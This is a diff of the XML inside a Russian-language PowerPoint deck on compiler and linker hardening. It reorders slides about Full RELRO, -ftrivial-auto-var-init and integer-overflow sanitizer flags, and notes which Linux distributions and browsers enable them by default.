-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Debian и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не включены по умолчанию ни в GCC, ни в Clang</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Firefox and Chromium: Memory Allocator Hardening</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и Fefora пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>F</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ull RELRO</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В пакетах Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> дефолтно не включён</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён по дефолту в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>BUILD.gn</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>flags.configure</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -36145,7 +36620,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9411C1E-D413-45A8-A79C-2EA0BE521325}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A5120B-FAAA-4EA3-9261-D059D90B41ED}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36172,7 +36647,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630769243"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015695599"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36204,7 +36679,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65176-1DCF-40BE-BC3B-1D07413D3E26}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36221,20 +36696,16 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Автоинициализация</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -36244,7 +36715,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B75EE06-796F-4150-9967-C80D9D14B36F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36258,13 +36729,77 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
+              <a:t>Опции линкера для включения </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-Wl,-z,now -Wl,-z,relro</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Ubuntu включены по умолчанию в GCC, но не в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>только </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>partial RELRO</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Debian и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не включены по умолчанию ни в GCC, ни в Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -36272,162 +36807,85 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в компиляторе в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Скрытый флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>initiall</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и Fefora пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ull RELRO</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в пакетах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
+              <a:t>В пакетах Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> дефолтно не включён</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Дискуссия в трекере </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu (</a:t>
+              <a:t>Включён по дефолту в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>#1972043</a:t>
+              <a:t>BUILD.gn</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в Chrome (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Chromium #</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>40633061</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>flags.configure</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не включён в Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Trivial Auto Var Init Experiments</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android user</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>- и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>kernelspace</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="sv-SE" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>System hardening in Android 11</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36436,7 +36894,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EDC4A3-65C4-4E94-A281-A0BE05178B80}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9411C1E-D413-45A8-A79C-2EA0BE521325}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36463,7 +36921,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607254691"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630769243"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36495,7 +36953,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E390CB5-FF6E-4765-B937-FC6BA0EF02FC}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36513,7 +36971,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Целочисленные переполнения</a:t>
+              <a:t>Автоинициализация</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -36535,7 +36993,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAADEE4F-0571-446A-90C7-1E44732CD1C9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36549,276 +37007,176 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="92500"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в компиляторе в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Скрытый флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-trap=signed-integer-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>overflow,pointer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-overflow</a:t>
-            </a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>initiall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не поддерживает </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>integer</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в пакетах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ещё раз отметим что </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>ftrapv</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0"/>
-              <a:t>неработоспособна</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=signed-integer-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>overflow,pointer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-overflow -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-minimal-runtime</a:t>
+              <a:t>Дискуссия в трекере </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>#1972043</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в Chrome (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Chromium #</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>40633061</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендую также добавлять </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=integer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(может потребоваться добавить некоторые </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>хедеры в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>blacklist</a:t>
+              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пока не включён в Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Trivial Auto Var Init Experiments</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Защита не используется в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>, а также в браузерах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox</a:t>
-            </a:r>
-          </a:p>
